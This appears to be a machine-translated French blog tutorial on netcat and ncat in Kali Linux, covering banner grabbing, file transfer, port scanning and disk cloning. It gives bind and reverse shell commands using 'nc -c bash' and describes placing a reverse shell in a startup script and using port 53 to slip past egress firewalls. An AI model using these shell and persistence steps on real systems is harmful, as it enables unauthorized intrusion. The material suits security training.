tutoriel kail (7) - outils de base (nc, ncat)

Outils communs

Fréquemment utilisé et puissant, un assistant indispensable pour les praticiens de la sécurité.

Nc / ncat

C'est un couteau suisse dans les outils réseau Caractéristiques: petite taille et fonctions puissantes.
Multiplateforme, il y a des fenêtres et Linux.
Choses que vous pouvez faire:

  • telnet / Obtenir des informations sur la bannière: NC est plus puissant que telnet
  • Transmettre des informations textuelles: Exemple: il peut être utilisé comme un outil de chat
  • Transférer des fichiers / répertoires
  • Fichier de transmission crypté: le fichier texte de transmission par défaut n'est pas crypté
  • Télécommande / cheval de Troie
  • Chiffrer tout le trafic
  • Serveur de streaming
  • Disque dur de clonage à distance
1.NC —— telnet / bannière

1. Vous pouvez telnet le port cible et envoyer certaines commandes pour vous connecter au service de l'autre partie.
nc peut être utilisé comme client ou serveur. En tant que client, il peut se connecter aux ports de service d'autres serveurs pour détecter les commandes envoyées par les ports de service.

 常用语法: nc -nv ip 端口
  -eg:nc -nv 1.1.1.1 80

nc -h  #可以查看参数的使用

Insérez la description de l'image ici

-v: affiche la sortie de connexion détaillée
-n: suivi de l'adresse IP, s'il est suivi du nom de domaine, le paramètre -n n'effectuera pas la résolution du nom de domaine. Il n'est donc pas recommandé de parler au nom de domaine.

Exemple 1: serveur 163

En tant que client, connectez-vous à la boîte aux lettres pop3.163.com
1. Résolution du nom de domaine, obtenez l'adresse IP
Insérez la description de l'image ici
2. Exécutez la commande
pop3 est le port 110, donc la commande est:

nc -vn 123.126.97.79 110

Insérez la description de l'image ici
Informations d'analyse:
les instructions d'exécution peuvent refléter le premier rôle de nc: après la connexion au port du serveur, vous verrez des informations de bannière liées au serveur. Grâce à la connexion, vous pouvez constater que le port 110 sur l'adresse du serveur est ouvert et renvoyé "Bienvenue dans ...". Grâce à cette ligne d'analyse des informations, nous pouvons savoir que le serveur de messagerie 163 utilise coremail, le service de messagerie implémenté par coremail.

Insérez la description de l'image ici
Informations d'analyse: Il
renverra une bannière d'informations du serveur 163smtp, une passerelle anti-spam spéciale du système coremail.


Exemple 2: serveur http

Insérez la description de l'image ici

2.NC —— Transmettre des informations textuelles

Par exemple: deux serveurs discutent.
Si vous avez besoin de deux serveurs pour interagir, vous avez besoin d'un des serveurs pour ouvrir le port d'écoute. Un autre serveur agit en tant que client pour se connecter à ce port.
A: nc -l -p numéro de port
B: nc -nv port ip La
Insérez la description de l'image ici
connexion est interrompue à une extrémité et les deux extrémités sont interrompues en même temps.


Convient pour la criminalistique électronique à distance.

Il existe un principe de criminalistique électronique: si un ordinateur est suspecté d'être un problème, il doit être audité pour minimiser ou ne pas modifier le contenu des fichiers dans l'ordinateur pour éviter de détruire les preuves qui peuvent être collectées.
Insérez la description de l'image ici
Insérez la description de l'image ici
-q: Quittez la commande pour vous déconnecter après un certain délai après l'exécution de la commande. Si la connexion n'est pas automatiquement déconnectée, on ne sait pas si la commande est terminée.

3.NC —— télécommande

Il ne peut remplacer ssh que dans une certaine mesure pour obtenir la télécommande, mais il ne peut pas être complètement remplacé.
Il peut réaliser un contrôle bidirectionnel.
Similaire peut être compris comme télécommande de bureau QQ.
** Remarque: ** Contrôlez les fenêtres via kail, vous pouvez installer nc sur windows, les utilisateurs de windows changent bash en cmd dans la commande.

Avant

Le client obtient l'autorisation shell du serveur.

#服务端:
A:nc -lp 端口 -c bash  #一旦别人用nc连接我,我会将bash shell通过nc的建立传给对方。
#客户端
B:nc -nv 服务端ip 端口

Insérez la description de l'image ici
Les fichiers répertoriés sur la gauche B ls sont le contenu de la machine virtuelle A sur la droite, ce qui équivaut à la télécommande de la machine virtuelle A. La machine virtuelle B a obtenu des autorisations shell pour la machine virtuelle A.

Inverser

Le serveur obtient l'autorisation shell du client.

#服务器
A:nc -lp 端口
#客户端
B:nc -vn 服务器ip  端口 -c bash

Insérez la description de l'image ici
B entre ls, pwd et d'autres commandes dans l'état de connexion nc, et rien ne se passe. A entre les informations de B obtenues par ces instructions. A ce stade, A a obtenu les autorisations shell de B.

Dans des circonstances normales: supposons que B soit un serveur placé dans la salle informatique IDC pour exécuter des services. Un pare-feu est généralement placé à la frontière de la salle informatique IDC. Le pare-feu n'ouvrira pas de ports très étranges et le mappera sur la machine virtuelle de A et autorisera les personnes à l'extérieur Il se connecte et le serveur de la salle informatique IDC filtrera le trafic d'accès restant de l'extérieur vers l'intérieur, à l'exception des ports ouverts, et le trafic sera bloqué au niveau du pare-feu de la frontière.
Pour les administrateurs réseau débutants: il
n'est pas pratique d'utiliser une connexion directe pour le moment. À ce stade, une connexion inverse peut être utilisée. L'attaquant A utilisé par le testeur de pénétration ouvre le port pour écouter activement et passe le script de démarrage du service sur B. Chaque fois que le système B est redémarré, il se connectera activement à l'adresse IP de l'attaquant A. Après la connexion, B passera activement son shell à l'attaquant A. Cette situation sera plus facile à réaliser. Parce que l'administrateur réseau ne restreint pas le contrôle de flux de l'intérieur vers l'extérieur.
Pour les administrateurs réseau ayant une meilleure connaissance de la sécurité:
il peut également y avoir des situations où il interdira la plupart du trafic de l'intérieur vers l'extérieur. Cependant, B doit avoir certains ports ouverts, par exemple, si le port 53 est ouvert, alors A peut ouvrir le port 53 pour écouter sur le port 53, afin que le pare-feu de bordure ne filtre pas ce comportement d'accès.
Pour un administrateur réseau très compétent en matière de sécurité,
il peut s'agir d'un serveur du groupe de serveurs intranet comme de son propre serveur DNF. Les autres serveurs d'entreprise sont vraiment du réseau interne vers le réseau externe et sont vraiment à l'intérieur du pare-feu. C’est vraiment difficile de se remettre.

4.NC —— NCAT

Toutes les fonctions de nc peuvent être réalisées par ncat.
Inconvénients NC:

  • Tout le trafic de données transmis par la CN n'est pas chiffré et manque de capacités de chiffrement. Facile à renifler.
  • Ouvrez le port et il sera utilisé par d'autres. Manque de capacités de vérification d'identité, ne peut pas juger de l'identité des utilisateurs.

NCAT doit combler ces lacunes, il est inclus dans la boîte à outils nmap, est l'une des suites d'outils nmap.


Un exemple

Utilisez ncat pour réaliser le chiffrement du pipeline. Indépendamment du fait que les données à l'intérieur soient en texte brut ou autre, les données vues lorsque quelqu'un saisit le paquet sont cryptées car le canal lui-même est crypté.

#服务端
ncat -c bash --allow 客户端ip  -vnl 端口  --ssl
#服务端
ncat -v 服务端ip  端口 --ssl

Insérez la description de l'image ici
Les informations sur les empreintes digitales de ssl sont différentes chaque fois que la connexion est établie.


Insérez la description de l'image ici
La machine virtuelle de droite autorise uniquement la machine virtuelle avec l'IP 118 à se connecter, mais à ce moment, l'IP de la machine virtuelle de gauche est 119, elle signalera les erreurs d'entrée et de sortie, la machine virtuelle de droite a été authentifiée et il vous demandera que la connexion n'est pas autorisée.

Il convient de noter que la fonction de paramètre nc des différentes plates-formes est différente dans les différentes versions.

4.NC —— Transférer des fichiers / répertoires

Transférer des fichiers:

#接收端打开端口
A:nc -lp 侦听端口 >文件名  #>,输出;侦听该端口侦听到的内容输出到文件名中
#发送端
B:nc -nv ip 端口< 文件名 -q 1  #<,将要传递的文件、文件名输入到nc的连接远端的端口里#传输端打开端口
A:nc  -lp 端口 < 文件名 -q 1
#接收端
B: nc -nv ip 端口> 文件名

L'une consiste à ouvrir le port et à attendre que d'autres transfèrent des fichiers, et l'autre à ouvrir le port et à attendre que d'autres acceptent des fichiers.


Transfert de catalogue

A:tar -cvf -  要打包的文件/ | nv -lp 端口 -q 1 #将打包的文件的输入作为后面文件的输出
B: nc -nv ip 端口 | tar -xvf -  #对收到的文件解包

Transfert de fichiers crypté

#接收端开放端口
A:nc -lp 端口|mcrypt --flush -Fbqd -a rijndael-256-m ecb >文件名  #侦听端口,将收到的文件解密输出
B: mcrypt --flush -Fbq -a rijndael-256-m ecb < 文件名 |nc -nv 接收端ip 端口 -q 1 #将文件加密输出

Insérez la description de l'image ici
Il n'est pas la fonction de cryptage de nc lui-même, mais le cryptage utilisant la commande mcrypt du système d'exploitation.
La commande mail par défaut n'est pas installée dans kail, vous devez l'installer vous-même.

apt-get install mcrypt #安装mcrypt命令
5.NC —— Service de diffusion multimédia en continu
A:cat 文件名 | nc -lp 侦听端口 #以流的形式输出到B端
B:nc -nv ip 端口 | mplayer -vo xll -cache 3000 -  #将流的内容给媒体播放器,接收一点播放一点,默认缓存大小是3000

La commande mplayer n'est pas installée par défaut et doit être installée.
Le contenu du fichier enregistré ne sera pas généré localement.

6.NC —— Balayage de port
nc -nvz ip 1-65535(可以改变端口区间)
nc -nvzu ip 1-65535(可以改变端口区间)

Par défaut, nc utilise le protocole tcp, donc si le port tcp est détecté. Si vous souhaitez détecter le port udp, vous pouvez utiliser la deuxième commande.
Les informations numérisées par chaque scanner ne sont pas nécessairement exactes. Il est recommandé d'utiliser plusieurs méthodes de numérisation, afin que les données obtenues soient relativement précises.

7. disque dur de clonage à distance NC

Pour la criminalistique électronique à distance, le disque dur du serveur cible peut être copié à distance ou la mémoire peut être copiée.

#接收端开放端口
A:nc -lp 开放端口 | dd -of=/dev/sda
B:dd if=/dev/sda |nc -nv ip 端口 -q 1
A publié 28 articles originaux · Likes0 · Visites 900

Je suppose que tu aimes

Origine blog.csdn.net/weixin_43876557/article/details/104522343
conseillé
Classement